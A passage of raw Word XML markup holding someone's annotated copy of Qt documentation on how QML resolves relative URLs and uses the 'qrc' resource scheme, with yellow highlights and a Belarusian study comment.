          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w: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71BEF">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Image</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w: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71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    source</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"images/logo.png"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId397" w:anchor="image" w:history="1">
        <w:r w:rsidRPr="00B71BEF">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Image</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>source property will be assigned</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://example.com/mystuff/images/logo.png</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, but while the QML is being developed, in say</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\User\Fred\Documents\MyStuff\test.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, it will be assigned</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\User\Fred\Documents\MyStuff\images\logo.png</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A93425">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If the string</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> assigned to a URL </w:t>
      </w:r>
      <w:r w:rsidRPr="00A93425">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is already an absolute</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL, then "resolving" does not change it and the URL is assigned directly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="008D55B3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="497" w:name="qrc-resources"/>
      <w:bookmarkStart w:id="498" w:name="_Toc483000637"/>
      <w:bookmarkStart w:id="499" w:name="_Toc483003654"/>
      <w:bookmarkStart w:id="500" w:name="_Toc483603990"/>
      <w:bookmarkStart w:id="501" w:name="_Toc483605210"/>
      <w:bookmarkEnd w:id="497"/>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QRC Resources</w:t>
      </w:r>
      <w:bookmarkEnd w:id="498"/>
      <w:bookmarkEnd w:id="499"/>
      <w:bookmarkEnd w:id="500"/>
      <w:bookmarkEnd w:id="501"/>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>One</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL schemes built into Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A93425">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"qrc" scheme</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This allows </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>content to be compiled into the executab</w:t>
      </w:r>
      <w:r w:rsidRPr="00A93425">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>le</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> using</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId398" w:history="1">
        <w:r w:rsidRPr="00B71BEF">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>The Qt Resource System</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Using this, an executable can reference QML content that is compiled into the executable:</w:t>
      </w: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71BEF">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQuickView</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">view </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQuickView</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>view</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setUrl</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QUrl</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"qrc:/dial.qml"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00A93425" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>content itself can then use relative URLs, and so be transparently unaware that the content is compiled into the executable</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A93425" w:rsidRPr="00A93425">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// да тлумачэння таго, што значыць гэта празрыстаць сістэмы рэсурсаў для </w:t>
      </w:r>
      <w:r w:rsidR="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qml</w:t>
      </w:r>
      <w:r w:rsidR="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> можа зусім яе не выкарыстоўваць, хаця тая існуе. //</w:t>
